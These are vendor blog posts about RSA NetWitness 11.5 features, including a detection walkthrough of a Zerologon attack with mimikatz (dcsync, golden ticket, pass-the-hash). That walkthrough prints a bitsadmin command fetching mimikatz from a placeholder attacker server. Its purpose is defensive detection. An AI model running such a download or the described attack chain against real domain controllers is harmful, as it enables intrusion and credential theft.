
RSA NetWitness Platform 11.5 has expanded support for Snort rules (also known as signatures) that can be imported into the network Decoders. Some of the newly supported rule parameters are:

  • nocase
  • byte-extract
  • byte-jump
  • threshold
  • depth
  • offset

This additional coverage enables administrators to use more of the commonly available detection rules that were not previously supported. The ability to use a broader set of Snort rules gives administrators another mechanism, alongside application rules and Lua parsers, to extend the detection of known threats.

 

To learn more about what is and is not supported, along with a much more detailed initial setup guide, check out Decoder Snort Detection.

 

Once configured, you can investigate the threats that Snort rules have triggered by examining the events and pivoting on the metadata (sig.id, sig.name) populated from the rules themselves, or by querying threat.source = 'snort rule' to find all Snort events. The Signature Identifier (sig.id) corresponds to the sid attribute of the Snort rule, while the Signature Name (sig.name) corresponds to the msg attribute in the rule options.
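As a hedged illustration (the rule content and sid below are invented for this example), a rule like the following would populate sig.id with 1000001 and sig.name with the msg text, and it exercises the newly supported nocase, offset, and depth parameters:

alert tcp any any -> any 80 (msg:"Example - suspicious user-agent"; content:"evil-agent"; nocase; offset:0; depth:200; sid:1000001; rev:1;)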

Snort rules found

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own.

Zerologon (CVE-2020-1472) is a vulnerability with a perfect CVSS score of 10/10 being used in the wild by attackers, allowing them to gain admin access to a Windows Domain Controller.

As more public exploits for this vulnerability are published, including support within the widely used mimikatz, even more attacks leveraging this vulnerability are expected, so it's crucial to be able to detect such attempts.

 

In this post we will see how this vulnerability can be exploited using mimikatz to gain administrative access to a Windows Domain Controller running on Windows Server 2019, and how the different stages of the attack can be identified by the RSA NetWitness Platform, leveraging Logs, Network and Endpoint data. This will include exploiting the Zerologon vulnerability, followed by the creation of golden tickets, and finally gaining admin access to the domain controller via a pass-the-hash attack.

  

We will assume that the attacker already has an initial foothold on one of the internal workstations, and now wants to move laterally to the domain controller.

 

 

Step 1

Attacker

The attacker downloads “mimikatz” on the compromised system using the “bitsadmin” command.
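For illustration only (the server URL and file paths here are invented), such a download typically looks like this:

bitsadmin /transfer job1 /download /priority normal http://<attacker-server>/mimikatz.exe C:\Users\Public\mimikatz.exe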

 

 

RSA NetWitness Endpoint

The executed command is detected by RSA NetWitness Endpoint and tagged as a remote file copy using BITS. The exact target parameters are also provided, allowing analysts to see where the file was downloaded from (identifying the attacker’s server) as well as the location of the downloaded file. In addition, since mimikatz is a known malicious file, we are able to tag the event accordingly.

 

 

 

RSA NetWitness Network

The resulting network session is captured by RSA NetWitness Network, identifying the client application as Microsoft BITS as well as the downloaded file (mimikatz.exe). If needed, the session can be reconstructed to extract the file for further forensics.

 

 

 

 

 

Step 2

Attacker

The attacker launches mimikatz, and tests whether the domain controller is vulnerable to the Zerologon vulnerability.

 

As the domain controller is vulnerable, the attacker executes the exploit.

 

 

RSA NetWitness Network

We know that the exploit starts with a “NetrServerReqChallenge” and spoofs the “NetrServerAuthenticate” with 8x ‘0’s (as seen in the previous screenshot). We also know that it takes an average of 256 such attempts for the attack to succeed.

This consequently leads to the following:

  • We expect to see “NetrServerReqChallenge” and “NetrServerAuthenticate”
  • Due to the large number of attempts, we expect the size of the session to be larger than other similar connections
  • We expect the session to contain a large number of 0's

 

 In fact, by looking at the captured network session, we can see these indicators tagged by RSA NetWitness.

 

As seen in the above screenshot:

  • The session is related to netlogon (as the vulnerability targets this service)
  • We can see both “NetrServerReqChallenge” and “NetrServerAuthenticate” within the session
  • The most common byte (MCB.REQ) is “0”
  • The size of the payload is around 200KB
  • As we also have the RSA NetWitness Endpoint agent installed on the workstation, we can link the captured network session to the process that generated this connection, in this case “mimikatz.exe”

 

Using this information, the use of this exploit could be identified with the following Application Rule:

service=135 && filename='netlogon' && action begins 'NetrServerAuthenticate' && action='NetrServerReqChallenge' && mcb.req=0 && size>40000

 

 

RSA NetWitness Logs

A successful attack would lead to the domain controller’s password being changed. This can be identified within the Windows Logs based on the following criteria:

  • Event ID: 4742 (A computer account was changed)
  • Source User: Anonymous logon
  • Destination User: ends with “$” sign
  • Hostname: specify your domain controllers

 

 

 

The following Application Rule / Query could be used for this detection:

device.type='windows' && reference.id='4742' && user.dst ends '$' && user.src='anonymous logon'

 

 

 

 

 

Step 3

Attacker

Once the attacker successfully exploits the domain controller, he now has access to it with replication rights. He can now use the “dcsync” feature of mimikatz to mimic the behavior of a domain controller and request the replication of specific users to get their password hashes. This can be done to get the password hash of the Administrator account as seen in the below screenshot.

 

 

 

RSA NetWitness Network

User Replication is requested using the “GetNCChanges” function, which would result in the domain controller providing the account hashes. This behavior can be seen based on the captured network traffic.

 

 

This behavior should be monitored and alerted on when initiated from an IP or subnet that is not expected to perform domain replication.

 

The following is a rule that can identify this behavior; it should be fine-tuned to exclude IP addresses that are expected to exhibit it:

 

action = 'drsgetncchanges' && ip.src != <include list of approved IP addresses>

 

 

RSA NetWitness Logs

This would also generate Windows logs with event ID 4662, but by default this log doesn’t provide enough granularity to avoid a large number of false positives, so it is not recommended as a detection mechanism on its own.

 

 

 

 

 

Step 4

Attacker

The attacker then gets a golden ticket with a validity of 10 years for the Administrator account.

 

He is then able to use the ticket in a pass-the-hash attack.

 

He is now able to get shell access to the domain controller without the need for authentication, and executes a couple of commands (hostname, whoami ...) to confirm he is connected to the Domain Controller.

 

 

 

RSA NetWitness Logs

The attacker gained shell access by using PsExec. This leads to the creation of a service named “psexesvc” on the domain controller that can be detected with Windows Logs and is tagged as a pass-the-hash attack by RSA NetWitness as seen below.
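As a minimal sketch (not the exact OOTB content; the event ID depends on which Windows channel you collect, and meta key names such as service.name may vary with your log parser), an Application Rule along these lines could surface the service creation:

device.type = 'windows' && reference.id = '7045' && service.name = 'psexesvc'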

 

 

RSA NetWitness Network

Leveraging network data can uncover more details.

As seen in the below screenshot, we can identify:

  • The use of the “Administrator” account to login over SMB
  • The use of Windows admin shares
  • The transfer of an executable within one of the sessions (psexec)
  • The creation of a service (psexesvc)

 

 

 

RSA NetWitness Endpoint

The initial execution of “cmd.exe” by PsExec on the Domain Controller to gain the shell access can easily be identified by RSA NetWitness Endpoint.

 

Any other command executed by the attacker after he gets shell access would also be identified and logged by RSA NetWitness Endpoint, with the ability to track which commands were executed and by which processes they were launched, providing a full picture of what the attacker is doing on the domain controller and how.

 

 

 

Conclusion

When dealing with such attacks and breaches, which often blend in with normal noise and behaviors, it becomes evident that a rich data set combining Logs, Network and Endpoint is critical both to detect the breach and to identify its full scope from start to end, for each step taken by the attacker.

Having visibility over East/West network traffic with rich metadata also brings a lot of value compared to relying on logs alone to detect and investigate this attack efficiently. With the release of the RSA NetWitness Platform v11.5 it is now possible to set up policies defining for which network traffic to keep or drop the full payload in addition to the metadata, allowing East/West network capture to be done more efficiently.

RSA NetWitness has supported Structured Threat Information eXpression (STIX™) for quite some time, as it has become the industry standard for open source cyber threat intelligence.

 

 

In NetWitness v11.5 we take the power of Threat Intelligence coming from STIX to the next level. When in Investigate or Respond views, you will now see context of the Intel delivered by STIX right there next to the meta like this:

 

To achieve this, the NetWitness Platform has enhanced its existing STIX integration to improve threat detection capabilities, with richer threat intel information to detect and respond to attacks in a timely manner. Now, when an analyst investigates threat intelligence information retrieved from a STIX data source, the context for each indicator is displayed. The context information includes viewing the adversary and attack details directly from Context Hub, in both the Investigate and Respond views.

 

Note that for the analyst to use this capability, an administrator needs to configure the STIX data sources to retrieve the threat intelligence data from the specified STIX source as below.

 

 

  1. Add & Configure STIX/TAXII as a 'Data Source' (note that you can add a TAXII server, REST server, or STIX file).
  2. Create Feeds: Set up a STIX feed from the Custom Feeds section. Note that you can now see all the existing STIX Data Sources (as added in the previous step) to create feeds from. See Decoder: Create a STIX Custom Feed for more details.
  3. Context Lookup Summary
  4. Context Lookup Details:

Here are the links to detailed documentation around STIX: 

 

Check it out and let us know what you think!

 

We strongly believe in the power of feedback! Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own.

As of RSA NetWitness 11.5, configuring what network traffic your Decoders collect and to what degree it should collect it has become much easier. Administrators can now define a collection policy containing rules for many network protocols and choose whether to collect only metadata, collect all data (metadata and packets), or drop all data.

 

NW 11.5 Selective Collection Policy Creation

 

This is made simpler by out-of-the-box (OOTB) policies that cover most typical situations. These can also be cloned and turned into a custom policy that fits your environment best. 

 

NW 11.5 Initial Selective Collection Policies

 

The policies are managed from a new central location that can publish them to multiple network Decoders at once. This allows an administrator to configure one collection policy for DMZ traffic and distribute it to all the DMZ Decoders, while simultaneously using a separate policy for egress traffic and distributing it to all the egress Decoders.

 

NW 11.5 Selective Collection Policy Status

 

An administrator can view which policies are published, the Decoders they have been applied to, when the last update was made and by whom. The policies can also be created in draft form (unpublished) and not distributed to Decoders until a maintenance window is available.

 

Initially this capability focuses on network collection, but the long-term plan is to continue adding types of configurations and content to be administered using this centralized management approach. Please reference the RSA NetWitness Platform 11.5 documentation for further details at Decoder: (Optional) Configure Selective Network Data Collection.

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

RSA NetWitness 11.5 introduces the ability to interactively filter events using the metadata associated with all the events. This is seen as a new Filter button inside the Event screen that opens the Filter Events panel.

 

NW 11.5 Event Filter Button

 

This new capability functions in two modes.

 

NW 11.5 Event Filter Panel

 

The first presents a familiar search experience for analysts of all skill levels as many websites have a similar layout where filters (attributes or categories of the data) exist on the left side of the page and the matching results display on the right side. As an example in the below image, clicking the metadata (#1) in this integrated panel automatically builds the query (#2) and retrieves the resulting table (#3) of matching events.

 

NW 11.5 Event Filter Interactive Workflow

 

As analysts use this, it helps them build an understanding of the relationship between the metadata associated with the events and how to use that metadata to structure a query.

 

NW 11.5 Full Screen Filter Events Panel

 

The second mode allows the panel to extend full screen, giving more real estate to show more metadata at once. This mode may seem very familiar to those who have used Navigate previously. As metadata values are clicked they are added as filters to the query bar, and the filter list updates based on the events filtered out. What it does not do is execute the query to retrieve the resulting table of events. This allows the analyst to hunt through the data and, when ready to see the results, minimize the Filter Events panel (highlighted in the above image) to reveal them.

 

In both modes, the meta values associated with the meta keys can be organized by event count or event size and sorted by the count or value. This allows analysts to sort descending by event count to find outliers, for example a small, limited number of communications. The meta keys can also be shown in smaller meta groups to help analysts focus on the most specific values for certain use cases. Analysts can use query profiles to execute a query with a predefined query, meta group, and column group, allowing them to jump right into a specific subset of data. The right-click actions that provide additional query and lookup options are also available. For a deeper dive into this capability, check out the Investigate documentation Investigate: Drill into Metadata in the Events View (Beta)

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

A business what?  A Business Context Feed provides context about systems or data present in NetWitness, to aid the analyst in understanding more about the system or data they are examining.  The Business Context Feed should answer some basic questions that always come up during analysis.

What is this system? - Web Server, Domain Controller, Proxy Server, etc...

What does it do? - Authentication, Database/Application Server, Customer Portal, etc...

Would it be considered a Critical Asset?

A classic scenario would be for an IP address.  If an analyst would like to know whether the IP address of interest is a Domain Controller, they would need to obtain or identify all of the IP addresses of the Domain Controllers.  Then a query must be constructed to determine if there is a match (ip.all= 10.1.22.36,10.1.22.37.14,10.16.4.3,10.8.48.89,... you get the idea).  If any content such as reports or alerts is developed for this use case, the list of IP addresses would need to be in all of those as well.  It can get complicated very quickly once you start putting this list of IPs in content, especially when the addresses change periodically.

Creating a Business Context Feed simplifies this use case by maintaining a single, centrally managed feed.  Updating the feed can even be automated in most cases.  When the feed is applied to this use case, the query shrinks from the long IP list above to a query using a custom metakey: hnl.asset.role='domain controller'.

Now, it is not uncommon for an organization to create around a dozen custom metakeys in NetWitness for their own use, to provide additional context for the data that is collected.  But not everyone takes the time to create a taxonomy document to set the standard for how the custom content will be defined and populated, which provides consistency for the other content developed around it.  Frankly, it is not advised to commingle custom meta values with the meta values that NetWitness creates natively.  This can create confusion about what the values "are" versus what they "should be", and can adversely affect other content that uses these standard keys.  There are also reserved metakeys where custom values do not belong; these can be identified in the Unified Data Model (UDM) as "Reserved" in the "Meta Class" column or in the "Notes" column (use "ctrl+f" in the browser).

When creating custom content it is important to set standards for how the content is created, including naming conventions, spelling, formatting and values.  This practice provides the consistency necessary for stable content development and performance.  Another common issue is that custom content becomes knowledge exclusive to the author, which can increase the time it takes to bring new people up to speed.  Time is another factor: as the undocumented knowledge goes stale, even the author often cannot recall the logic behind the naming, purpose, or values.  The taxonomy document takes this burden off the content author and provides a reference for all parties involved in creating, updating and consuming the content.

Below is an example use case of the taxonomy to create custom metakeys and content to identify critical assets.

 

Creating Custom Metakeys - Things to Know

Name Length

You are limited to 16 characters (including the "." dot delimiter).  Use lowercase only for names and values.

 

Allowed Characters

Only alphanumeric characters are allowed, except for the "." delimiter.

 

Name Construction

Metakey names should follow the Unified Data Model (UDM) "3 Logical Parts" and should not conflict with any current RSA keys.


Metakey concept image

Value Format

You must decide what value your metakey will store and define it in the appropriate custom index files if needed. The most commonly used formats are "Text" and "Integer"; other formats exist, but these are the most common.

 

Multivalued Field

You must properly identify whether or not your metakey may contain multiple values in the same session.  A single-valued key is marked with singleton="true" in the Concentrator custom index files.  This lets ESA automatically identify the field as either a multivalued field (array) or a single-valued field.

 

Example Use Case:  Creating Critical Asset Metakeys

Concept

The concept is the least specific part of the metakey name, typically used to group the metakeys or, in this case, to clearly distinguish the custom metakeys from the standard metakeys.  The concept for these asset metakeys will be an abbreviation of my "Homenet Lab"; it is not uncommon to use an abbreviated company name here.  I will use "hnl" in this case.

 

Context

The context is more specific and typically defines the "classification" of the key.  A context name of "asset" will be used here, as these keys are for identifying the critical assets.

 

Sub-Context 

The sub-context is the most specific part; the sub-context values used here are shown below:

Description    Sub-Context Abbreviation
Criticality    crit
Category       cat
Role           role
Hostname       host
Date           date
Location       loc

 

General Description of the Metakeys

The table below contains the metakey names fully assembled with the "concept.context.sub-context" values applied, showing a general description of the custom metakeys.

Metakey Name      Description
hnl.asset.crit    Numeric "Criticality" rating of the asset
hnl.asset.cat     "Category" of the asset
hnl.asset.role    "Role" of the asset
hnl.asset.host    "Hostname" of the asset
hnl.asset.date    "Date" the asset was added to the feed
hnl.asset.loc     "Location" of the asset

 

Metakey Value Format

Define whether this metakey value will be text or an integer.

Metakey           Value Format   Store Multiple Values
hnl.asset.crit    UInt8          No
hnl.asset.cat     Text           Yes
hnl.asset.role    Text           Yes
hnl.asset.host    Text           No
hnl.asset.date    UInt32         No
hnl.asset.loc     Text           No

 

Metakey Values

hnl.asset.crit

This metakey identifies the criticality of the system.  The table below lists the possible values and describes the values to use in the metakey.

Metakey Value    Description
1                Extremely Critical
2                Highly Critical
3                Moderately Critical
4                Low


hnl.asset.cat

This metakey identifies the category of the system.  The table below lists the possible values and describes the values to use in this metakey.  Note the values are always lowercase.

Metakey Value     Description
authentication    Systems that provide authentication services, like domain controllers, LDAP servers, RADIUS, SecurID, TACACS, etc.
firewall          Systems that provide firewall services.
scanner           Systems that perform scanning activities like a port/vulnerability scanner or pen test.
network           Network infrastructure.

 

hnl.asset.role

This metakey identifies the role of the system.  The table below lists the possible values grouped by category along with the descriptions of the values to use in this metakey.  Note the values are always lowercase.

Category          Description                                Value
authentication    Microsoft Active Directory                 domain controller
authentication    RADIUS Server                              radius server
authentication    SecurID Server                             securid server
firewall          Firewall operating in the ecommerce DMZ    ecommerce dmz
firewall          Internal firewall for secure hosting       secure hosting
firewall          Internet Perimeter Firewall                internet perimeter
scanner           Vulnerability Scanner                      vulnerability
scanner           Penetration testing                        pentest
network           Core network router                        core router
network           Core network switch                        core switch

 

hnl.asset.host

This metakey contains the short hostname in lowercase.

 

hnl.asset.date

This metakey contains the numeric date the system was added to the feed, in YYYYMMDD format.  The date is used to determine the age of the entry and also to establish that no contextual meta was generated prior to this date.

 

hnl.asset.loc

This metakey identifies the location of the system. The table below lists the possible values and describes the values to use in this metakey. Note the values are always lowercase.

Metakey Value    Description
hqdc-01          Headquarters Data Center 1
lvdc-02          Leonardville Data Center 2
mscwdc-03        Moscow Data Center 3
raddc-04         Radium Data Center 4

 

Sample Business Context Feed Using Taxonomy

User Friendly Version:

#index            hnl.asset.crit   hnl.asset.cat    hnl.asset.role      hnl.asset.host   hnl.asset.date   hnl.asset.loc
10.0.0.1          1                firewall         perimeter           hnlhqfw-01       20200708         hqdc-01
192.168.1.1       1                firewall         secure hosting      hnlshfw-02       20200708         hqdc-01
192.168.63.100    1                authentication   domain controller   hnraddc-01       20200708         raddc-04
192.168.1.87      1                authentication   domain controller   hnlvdc-02        20200708         lvdc-02
192.168.50.100    1                authentication   domain controller   hnmscwdc-03      20200708         mscwdc-03
10.0.0.16         1                network          core switch         hnlcsw-01        20200708         hqdc-01

 

CSV File format for Feed Consumption:

#index,hnl.asset.crit,hnl.asset.cat,hnl.asset.role,hnl.asset.host,hnl.asset.date,hnl.asset.loc
10.0.0.1,1,firewall,perimeter,hnlhqfw-01,20200708,hqdc-01
192.168.1.1,1,firewall,secure hosting,hnlshfw-02,20200708,hqdc-01
192.168.63.100,1,authentication,domain controller,hnraddc-01,20200708,raddc-04
192.168.1.87,1,authentication,domain controller,hnlvdc-02,20200708,lvdc-02
192.168.50.100,1,authentication,domain controller,hnmscwdc-03,20200708,mscwdc-03
10.0.0.16,1,network,core switch,hnlcsw-01,20200708,hqdc-01

 

Customizing Index

Now that the metakey names and values have been established they can be added to the necessary index custom files so that they are available to the analyst in Investigate.

 

Log/Network Decoders

There are two metakeys that are defined as integers, so we need to tell the Log or Network Decoder that these metakeys are to be formatted as integers.

The following custom index files need to be modified with the entries below:

index-logdecoder-custom.xml (Log Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" format="UInt32" level="IndexNone"/>

index-decoder-custom.xml (Network Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexNone"/>

Concentrators

All of the custom meta keys will need to be added to the Concentrator to be available in Investigate for the Analysts.

The following custom index file needs to be modified with the entries below.

index-concentrator-custom.xml (Concentrator)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet custom index keys added to provide additional information from feeds *** -->

<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Category" name="hnl.asset.cat" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Role" name="hnl.asset.role" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Hostname" name="hnl.asset.host" singleton="true" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Date Added" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexValues" valueMax="100"/>
<key description="HNL Asset Location" name="hnl.asset.loc" singleton="true" format="Text" level="IndexValues" valueMax="50"/>

 

Now you have more information than just an IP address to look at thanks to the Taxonomy and a Business Context Feed.
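For example (a sketch using the keys defined above; the values come from your own feed), an analyst could now pivot straight to the most critical authentication assets with a query such as:

hnl.asset.role = 'domain controller' && hnl.asset.crit = 1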

 

As of RSA NetWitness Platform 11.5, analysts have a new landing page option to help them determine where to start upon login.  We call this new landing page Springboard.  In 11.5 it becomes the new default starting page upon login (adjustable) and can be accessed from any screen simply by clicking the RSA logo at the top left.

 

The Springboard is a specialized dashboard (independent of the existing "Dashboard" functionality) designed as a starting place where analysts can quickly see the variety of risks, threats, and most important events in their environment.  From the Springboard, analysts can drill into any of the leads presented in each panel and be taken directly to the appropriate product screen with the relevant filter pre-applied, saving time and streamlining the analysis process.  

 

As part of the 11.5 release, Springboard comes with five pre-configured (adjustable) panels that will be populated with the "Top 25" results in each category, depending on the components and data available:

 

Top Incidents - Sorted by descending priority.  Requires the use of the Respond module.

Top Alerts -  Sorted by descending severity, whether or not they are part of an Incident. Requires the use of the Respond module.

Top Risky Hosts -  Sorted by descending risk score.  Requires RSA NetWitness Endpoint.

Top Risky Users - Sorted by descending risk score.  Requires RSA UEBA.
Top Risky Files - Sorted by descending risk score. Requires RSA NetWitness Endpoint.

 

Springboard administrators can also create custom panels, up to a total of ten, of a sixth type that aggregates "Events" based on any existing saved query profile used in the Investigate module.  This only requires the core RSA NetWitness Platform, with data sourced from the underlying NetWitness Database (NWDB).  This enables organizations to add their own starting places for analysts that go beyond the defaults, and to customize the landing experience to match the deployed RSA NetWitness Platform components:

 

Example of custom Springboard Panel creation using Event data

 

For more details on management of the Springboard, please see: NW: Managing the Springboard 

 

And as always, if you have any feedback or ideas on how we can improve Springboard or anything else in the product, please submit your ideas via the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform  

RSA is pleased to announce the availability of the NetWitness Export Connector, which enables customers to export NetWitness Platform events and route the data wherever they want, all in a continuous, streaming fashion, providing the flexibility to satisfy a variety of use cases.

 

This plugin is installed on Logstash and integrates with NetWitness Platform Decoders and Log Decoders. It aggregates metadata and raw logs from the Decoder or Log Decoder and converts them to a Logstash JSON object, which can easily integrate with numerous consumers such as Kafka, AWS S3, TCP, Elastic and others.

 

Work Flow of NetWitness Export Connector 

 

  • The input plugin collects metadata and raw logs from the Log Decoder, and metadata from the Decoder. The data is then forwarded to the Filter plugin.
  • The Filter plugin adds, removes, or modifies the received data and forwards it to the Output plugin.
  • The Output plugin sends the processed event data to the consumer destinations. You can use the standard Logstash output plugins to forward the data.
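As a rough sketch of what such a pipeline could look like (the input plugin name and its settings below are illustrative assumptions rather than the documented configuration; kafka is a standard Logstash output plugin):

input {
  # hypothetical name and settings for the NetWitness Export Connector input plugin
  netwitness_export_connector {
    decoder_host => "logdecoder.example.local"   # assumed setting
    decoder_port => 50002                        # assumed setting
  }
}
filter {
  # optional enrichment before shipping the event downstream
  mutate { add_field => { "pipeline" => "netwitness-export" } }
}
output {
  kafka {
    bootstrap_servers => "kafka1:9092"
    topic_id => "netwitness-events"
  }
}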

 

Check it out and let me know what you think!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

 

Download and Documentation

https://community.rsa.com/docs/DOC-114086

We are excited to announce the release of the new RSA OSINT Indicator feed, powered by ThreatConnect!  

 

What is it?

There are two new feeds that have been introduced to RSA Live, built on Open Source Intelligence (OSINT) that has been curated and scored by our partners at ThreatConnect:

  • RSA OSINT IP Threat Intel Feed, including Tor Exit Nodes
  • RSA OSINT Non-IP Threat Intel Feed, which includes indicators of types:
    • Email Address
    • URLs
    • Hostnames
    • File Hashes


These feeds are automatically aggregated, de-duplicated, aged and scored with ThreatConnect's ThreatAssess score. ThreatAssess is a metric combining both the severity and confidence of an indicator, giving analysts a simple indication of the potential impact when a matching indicator is observed.  Higher ThreatAssess scores mean higher potential impact.  The range is 0-1000, with RSA opting to focus on the highest-fidelity indicators with scores of 500 or greater (as of the 11.5 release; subject to change as needed).

 

Who gets it?

These feeds are included for any customer, with any combination of RSA NetWitness Logs, RSA NetWitness Packets, or RSA NetWitness Endpoint under active maintenance at no charge. The feed will work on any version of RSA NetWitness, but please see the How do I deploy it? section for notes on version-specific considerations.

 

How do I deploy it?

These feeds will show up in RSA Live as follows:

 

To deploy and/or subscribe to the feed, please take a look at the detailed instructions here: Live: Manage Live Resources 

 

11.4 and earlier customers will want to add a new ioc.score meta key to their Concentrator(s) in order to be able to query and take advantage of the ThreatAssess score of any matched indicator. Please see 000026912 - How to add custom meta keys in RSA NetWitness Platform  for details on how to do this. Please note that this meta key should be of type UInt16 - inside the index file, the definition should look similar to this:
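For illustration, an entry modeled on the other custom index keys shown in these blogs could look like the following (the description and valueMax are assumptions; the key name and UInt16 format come from the note above):

<key description="IOC Score" name="ioc.score" format="UInt16" level="IndexValues" valueMax="100"/>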

 

11.5 and greater customers do not need to add this key, as it's already included by default.

 

 

How do I use it?

Once the feeds are deployed, any events or sessions with matching indicators will be enriched with two additional meta values, ioc and ioc.score.  These values are available in all search, investigation, and reporting use cases, assuming those keys have been enabled.
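For example (a hedged sketch; the threshold of 800 is arbitrary), an analyst could focus on the highest-impact matches with a query like:

ioc exists && ioc.score >= 800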

 

 

eg. Events filter view

eg. Event reconstruction view

 

What happens to the "RSA FirstWatch" and Tor Exit Node feeds?

If you are running these new feeds, you do not need to run the existing RSA FirstWatch & Tor Exit Node feeds in parallel, as they are highly redundant and tend to be less informative when matches occur.  At some point in the near future, once we believe the impact will be minimal, we will officially deprecate the RSA FirstWatch & standalone Tor Exit Node feeds.

 

Do you have ideas?

If you have ideas on how to make these feeds better, ideas for content creation leveraging these feeds, or anything else in the RSA NetWitness portfolio, please submit and vote on ideas in the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

Before I jump into explaining the relationship between RSA NetWitness, as an evolved SIEM and threat defense platform, and Gartner’s SOC Visibility Triad, I’m going to start by talking about Gartner for a minute. I expect everyone knows who Gartner are: a leading worldwide IT research and advisory organization, one of the most trusted and reputable, and active within the cyber security field covering SOC threat detection and response tools such as SIEM, NTA, EDR, UEBA, SOAR, etc. The reason we are mentioning Gartner today is that last year they did a great piece of work that sought to simplify complex views of modern security toolset requirements into a single picture of what good looks like.

 

They called it the SOC Visibility Triad, and it calls out the three pillars of security: your traditional log-centric SIEM alongside network-oriented and endpoint security detection and response tools.

Combining these three technologies helps fill the gaps among them to provide full security visibility. That combined approach significantly reduces the chances of an internal or external bad actor evading your deployed systems for a prolonged period of time, which ultimately enables you to effectively meet the required SOC metrics in terms of MTTD/MTTR and cut down the bad actor's dwell time.

 

The reason we like it is that Gartner, arguably the most respected of today’s analysts, has essentially drawn the core of RSA NetWitness.

 

RSA NetWitness brings together the breadth of coverage of log management solutions with the detailed intelligence and forensic worlds of endpoint and network into a single, modular and powerful security platform.

  

Cyber security has always been a battleground, so there has always been evolution in the tools used to attack and the tools used to defend. More recently we’ve seen huge rises in the use of automation by attackers, massive ransomware campaigns, huge data breaches and some pretty big fines being handed out through regulation like GDPR. Of course, most recently, the Covid-19 pandemic has seen huge numbers of businesses suddenly alter the way they do business, and consequently their security posture, by rapidly allowing remote access to their corporate resources from anywhere.

 

All these cyber security pressures, combined with most businesses’ thirst for technology adoption and digitization, created huge change. At the heart of the change are security teams trying to build or maintain adequate protections while being business enablers, not blockers.

 

To succeed, security teams need to move from the conventional approach of multi-layered, disjointed security tooling that uses old detection methods like rules and signatures to something more valuable. Modern security tooling needs to be able to consume all data sources, not just logs, and use the latest analysis techniques like machine learning to find important security insights and reduce the alert noise created by traditional approaches. Full visibility is important, and by that we don’t just mean having visibility across the whole estate. We also mean combining intelligence from those data sources to uncover threats the individual tools wouldn’t notice.

 

As you’d expect, Gartner name us as a leader in their MQ reporting for this very reason.

 

 

Using a mixed detection approach that combines a large library of out-of-the-box rule sets with the latest in machine learning, RSA NetWitness, as a modular, deploy-anywhere platform, can automatically classify alerts based on their risk score across all data sources, fully aligned with the MITRE ATT&CK framework, and Gartner agreed that as a single platform RSA NetWitness shines.

 

For the traditional log-centric SIEM space, we offer comprehensive integration coverage (see the RSA NetWitness Platform Integrations Catalog) and an intuitive, interactive UI (https://community.rsa.com/docs/DOC-110149#Incident_Response) with advanced query and correlation capabilities. We can consume log data from 350+ log sources, with all of this data filtered, normalized and enriched at capture time, then apply real-time correlation-based analytics and reporting to provide real-time alerts and dashboard visibility into any spotted threat.  NetWitness also extends this with a fully unsupervised, multi-model, machine learning UEBA (User and Entity Behavioral Analytics) engine. This engine forms a picture of normal user and entity (endpoint, network) activity and finds anomalies automatically, for example a malicious insider, credential theft, brute force, or process injection (further details on UEBA use cases and indicators can be found here: UEBA: NetWitness UEBA Indicators)

 

The network detection space is really where RSA NetWitness was born, and it is unbeaten there. RSA NetWitness can perform continuous full-packet capture while providing real-time network threat detection across OSI layers 2 through 7. As with log data, this data is normalized and enriched alongside all other data sources. Specifically, with packet data we can reconstruct entire network sessions and extract malicious payloads, digital artefacts and the like for further analysis.

 

At the endpoint, RSA NetWitness provides further security intelligence by tracking system and user space processes and further feeding the UEBA engine. With our lightweight agent we can perform remediation measures directly on endpoints, from simple process shutdowns or protocol blocks to full endpoint isolation, to stop compromise at the source (How to Isolate a Host from the Network ). Also, as with network detection, we can pull interesting artefacts such as malicious programs, the MFT, and system/process dump files from the endpoint for deeper analysis.

 

All of this gathered and generated security data can be enriched with our threat intelligence engine, which provides yet more insight, confidence and risk scoring around known threats like compromised IP addresses, malicious code or actors. This provides huge amounts of insight for use in threat remediation and incident response activities. These threat responses can be tracked or automated through the main analyst interface (Respond: Responding to Incidents ), or through our security orchestration and automation (SOAR) engine, NetWitness Orchestrator (Security Automation and Orchestration ).

 

We describe RSA NetWitness as a reliable evolved SIEM and threat defense SOC platform because of this ability to produce high-fidelity alerts across all data sources, lower false positives through the depth of its insight, and detect threats faster. It can also act as your storyteller, allowing you to go back in time and pick through an attack blow by blow. It goes beyond single indicator-of-compromise detection to malicious log/network/endpoint/user behavior and TTP (Tactics, Techniques and Procedures) detection, getting you a step ahead of the threat and ultimately improving your overall digital immunity across your estate, in a proactive manner, in the face of known and unknown threats.

 

Importantly, it gives you the best possible information to answer the burning questions during any attack:

When and how did it happen?

What systems were affected?

